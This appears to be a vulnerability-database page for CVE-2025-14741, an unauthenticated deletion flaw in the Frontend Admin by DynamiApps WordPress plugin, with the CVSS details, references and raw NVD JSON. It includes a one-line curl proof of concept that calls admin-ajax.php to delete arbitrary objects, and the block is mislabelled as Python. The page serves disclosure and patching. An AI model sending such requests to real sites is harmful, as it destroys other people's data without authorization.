CVE-2025-14741

Description

The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to missing authorization to unauthorized data modification and deletion due to a missing capability check on the 'delete_object' function in all versions up to, and including, 3.28.25. This makes it possible for unauthenticated attackers to delete arbitrary posts, pages, products, taxonomy terms, and user accounts.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Frontend Admin by DynamiApps <= 3.28.25

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

curl -X POST http://target.com/wp-admin/admin-ajax.php -d 'action=delete_object&object_id=123&object_type=post'

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14741
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14741
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14741/
[4] VulDB https://vuldb.com/cve/CVE-2025-14741
[5] https://plugins.trac.wordpress.org/browser/acf-frontend-form-element/tags/3.28.26/main/frontend/fields/general/class-delete-object.php?marks=106,119,132,142#L106
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/53adbab6-953a-4a6f-bbfc-89efdbdd28e0?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14741", "sourceIdentifier": "[email protected]", "published": "2026-01-09T08:15:57.660", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to missing authorization to unauthorized data modification and deletion due to a missing capability check on the 'delete_object' function in all versions up to, and including, 3.28.25. This makes it possible for unauthenticated attackers to delete arbitrary posts, pages, products, taxonomy terms, and user accounts."}, {"lang": "es", "value": "El plugin Frontend Admin de DynamiApps para WordPress es vulnerable a la falta de autorización para la modificación y eliminación no autorizadas de datos debido a una falta de verificación de capacidad en la función 'delete_object' en todas las versiones hasta la 3.28.25, inclusive. Esto hace posible que atacantes no autenticados eliminen publicaciones, páginas, productos, términos de taxonomía y cuentas de usuario arbitrarios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/acf-frontend-form-element/tags/3.28.26/main/frontend/fields/general/class-delete-object.php?marks=106,119,132,142#L106", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/53adbab6-953a-4a6f-bbfc-89efdbdd28e0?source=cve", "source": "[email protected]"}]}}